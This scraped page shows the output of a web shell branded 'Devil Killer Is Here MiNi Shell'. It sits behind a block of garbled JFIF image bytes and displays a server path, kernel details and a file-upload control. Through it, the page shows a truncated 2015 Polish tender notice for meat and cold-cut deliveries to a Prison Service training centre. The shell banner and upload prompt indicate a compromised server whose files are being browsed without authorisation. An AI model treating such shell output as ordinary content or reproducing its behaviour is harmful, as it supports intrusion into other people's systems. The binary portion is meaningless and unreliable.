JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150508/108010-N-2015.html

<p class="kh_header"><b>Lubiewo: Przetarg nieograniczony na dostawy artykułów stanowiących rodzaj - mięso wieprzowe, wołowe i wędliny</b><br>
<b>Numer ogłoszenia: 108010 - 2015; data zamieszczenia: 08.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej , 144, 89-526 Lubiewo, woj. kujawsko-pomorskie, tel. 052 33 412 25 wew. 306, faks 0-52 3341225 wew.316.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Służby Więziennej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawy artykułów stanowiących rodzaj - mięso wieprzowe, wołowe i wędliny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej

Część I:


Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wieprzowina
151 130 00-3
Boczek świeży
kg
90


golonka
kg
900


golonka
kg
900


karkówka
kg
1500


Kości wieprzowe 
kg
500


łopatka
kg
2800


Mięso gulaszowe
kg
400


Mięso mielone
kg
500


polędwiczki
kg
25


schab
kg
2400


słonina
kg
30


szynka
kg
2400


Tusze wieprzowe 
kg
400


żeberka
kg
400





Część II: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Mięso suszone, solone, wędzone lub marynowane
151 312 00-7
boczek
kg
1900


podgardle
kg
10


Kości wieprzowe 
kg
200

Część III: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


podroby
151 140 00-0
Żołądki wołowe
kg
500


wątroba
kg
400


ozory
kg
20


Część IV: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


szynka
151 314 10-2
szynka
kg
350


szynka
kg
300


szynka
kg
300

Część V: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




Wędliny drobiowe
151 311 35-0
Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
300


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
300


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
300


Wędlina drobiowa
kg
300

Część VI: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Kaszanka  i inne  wędliny krwiste
151 314 10-2
Wędlina krwista
kg
250


kaszanka
kg
350







Część VII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
220


Wędlina  drobno rozdrobniona
kg
300


Wędlina grubo rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
250


Wędlina drobno rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
300


Wędlina drobno rozdrobniona
kg
300


Wędlina drobno rozdrobniona
kg
300


Wędlina  średnio rozdrobniona
kg
900

Część VIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Golonka wieprzowa
kg
20


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
400


Wędlina wieprzowa
kg
350


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
200


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
250

Część IX: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn
miary
Ilość

1




wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
200


Wędlina średnio rozdrobniona
kg
900


Wędliny średnio rozdrobnione
kg
500


Wędlina średnio rozdrobniona
kg
900

Część X: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Salami
151 312 30-6
salami
kg
200
2


Wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
250


Wędlina grubo rozdrobniona
kg
300


Wędlina drobno rozdrobniona
kg
300


Wędlina średnio rozdrobniona
kg
250


Wędlina wieprzowa
kg
300


wędlina
kg
600


Wędlina wieprzowa
kg
300


Wędlina grubo rozdrobniona
kg
350


wędlina
kg
250

Część XI: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Pasztety
151 313 10-1
pasztetowa
kg
200


Pasztet 
kg
25


Pasztet 
kg
25


Pasztet firmowy
kg
150

Część XII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
wołowina
151 111 00-0
wołowna
kg
400

Część XIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wieprzowina
151 130 00-3
Boczek świeży
kg
50


Nogi wieprzowe 
kg
50


golonka
kg
200


Karkówka b/k
kg
300


Karkówka z/k
kg
100


Łopatka b/k
kg
300


Łopatka z/k
kg
200


Mięso mielone
kg
300


Polędwiczki wieprzowe 
kg
100


Schab b/k
kg
300


Schab z/k
kg
200


słonina
kg
100


Szynka b/k
kg
300


Szynka z golonką
kg
100


Szynka z/k
kg
150


żeberka
kg
100

Część XIV: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Mięso suszone, solone, wędzone lub marynowane
151 312 00-7
Boczek wędzony
kg
200


Polędwica wędzona
kg
100


baleron
kg
200

Część XV: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


podroby
151 140 00-0
Flaki wołowe
kg
200


Ozory  wieprzowe 
kg
50

Część XVI: 


Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


szynka
151 314 10-2
Szynka gotowana
kg
150


Szynka wędzona
kg
30

Część XVII: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




Wędliny drobiowe
151 311 35-0
Beton drobiowy
kg
50


Mielonka drobiowa
kg
100


Polędwica drobiowa
kg
100


Pierś drobiowa
kg
50


Śniadaniowa drobiowa
kg
50


Szynka tostowa drobiowa
kg
30


Rolada drobiowa
kg
30


Szynka drobiowa
kg
50

Część XVIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Kaszanka  i inne  wędliny krwiste
151 314 10-2
Salceson czarny
kg
150


Salceson ozorkowy
kg
30


krupnioki
kg
50


kaszanka
kg
150

Część XIX: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Luncheon meat (lanszmit)
kg
100


metka
kg
100


mortadela
kg
150


Parówka cienka
kg
100


Parówka - serdelka
kg
100


Parówka hot-dog
kg
100


Część XX: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Kiełbasa śląska
kg
100


Kiełbasa zwyczajna
kg
400


Kiełbasa toruńska
kg
150


kabanosy
kg
50


Kiełbasa biała parzona
kg
300


Część XXI: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Salami
151 312 30-6
Salami
kg
50
2


Wędliny
151 311 30-5
Krakowska parzona
kg
150


ogonówka
kg
200


Szynka konserwowa prasowana
kg
100


szynkowa
kg
300


żywiecka
kg
150

Część XXII: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
Pasztety
151 313 10-1
pasztetowa
kg
200

Część XXIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1
wołowina
151 111 00-0
wołowina
kg
250.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.11.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 SIWZ postępowania oświadczeń i dokumentów, wg. formuł: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Okres związania cenami określonymi w ofercie wynosi 30 dni od daty podpisania umowy. Po tym okresie strony dopuszczają zmiany cen określonych w ofercie dostarczanych produktów, z zastrzeżeniem, iż zostaną spełnione łącznie następujące warunki:
1) wyłącznym powodem zmiany cen będzie zmiana kwartalnego wskaźnika cen towarów i usług konsumpcyjnych ogłaszanego przez Prezesa GUS w Monitorze Polskim po 30 dniach od podpisania umowy,
2) zmiana cen odpowiadać będzie, z uwzględnieniem pkt. 3 i 4 poniżej, zmianie wskaźnika, o którym mowa w pkt. 1 za ostatni kwartał, a jeżeli w poprzednim kwartale lub w poprzednich kwartałach ceny nie były zmieniane, sumie wskaźników kwartalnych od ostatniej zmiany cen lub od daty, w której upłynął termin związania ceną,
3) zmiana ceny danego produktu wynosić będzie co najmniej 1 grosz,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej, 89-526 Lubiewo, Sucha 144.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2015 godzina 12:00, miejsce: Ośrodek Doskonalenia Kadr Służby Więziennej w Suchej, 89-526 Lubiewo, Sucha 144 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wieprzowina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wieprzowina
151 130 00-3
Boczek świeży
kg
90


golonka
kg
900


golonka
kg
900


karkówka
kg
1500


Kości wieprzowe 
kg
500


łopatka
kg
2800


Mięso gulaszowe
kg
400


Mięso mielone
kg
500


polędwiczki
kg
25


schab
kg
2400


słonina
kg
30


szynka
kg
2400


Tusze wieprzowe 
kg
400


żeberka
kg
400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso suszone, solone, wędzone lub marynowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Mięso suszone, solone, wędzone lub marynowane
151 312 00-7
boczek
kg
1900


podgardle
kg
10


Kości wieprzowe 
kg
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podroby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


podroby
151 140 00-0
Żołądki wołowe
kg
500


wątroba
kg
400


ozory
kg
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szynka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


szynka
151 314 10-2
szynka
kg
350


szynka
kg
300


szynka
kg
300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wędliny drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




Wędliny drobiowe
151 311 35-0
Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
300


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
300


Wędlina drobiowa
kg
200


Wędlina drobiowa
kg
300


Wędlina drobiowa
kg
300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kaszanka i inne wędliny krwiste.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI: 

Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość
1


Kaszanka  i inne  wędliny krwiste
151 314 10-2
Wędlina krwista
kg
250


kaszanka
kg
350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.14.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
220


Wędlina  drobno rozdrobniona
kg
300


Wędlina grubo rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
250


Wędlina drobno rozdrobniona
kg
350


Wędlina drobno rozdrobniona
kg
300


Wędlina drobno rozdrobniona
kg
300


Wędlina drobno rozdrobniona
kg
300


Wędlina  średnio rozdrobniona
kg
900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VIII: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn.
miary
Ilość

1




wędliny
151 311 30-5
Golonka wieprzowa
kg
20


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
400


Wędlina wieprzowa
kg
350


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
250


Wędlina wieprzowa
kg
200


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
300


Wędlina wieprzowa
kg
250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IX: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
Jedn
miary
Ilość

1




wędliny
151 311 30-5
Wędlina średnio rozdrobniona
kg
200


Wędlina średnio rozdrobniona
kg
900


Wędliny średnio rozdrobnione
kg
500


Wędlina średnio rozdrobniona
kg
900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część X: 
Lp.
Nazwa przedmiotu zamówienia
Nazwa własna oferowanego produktu
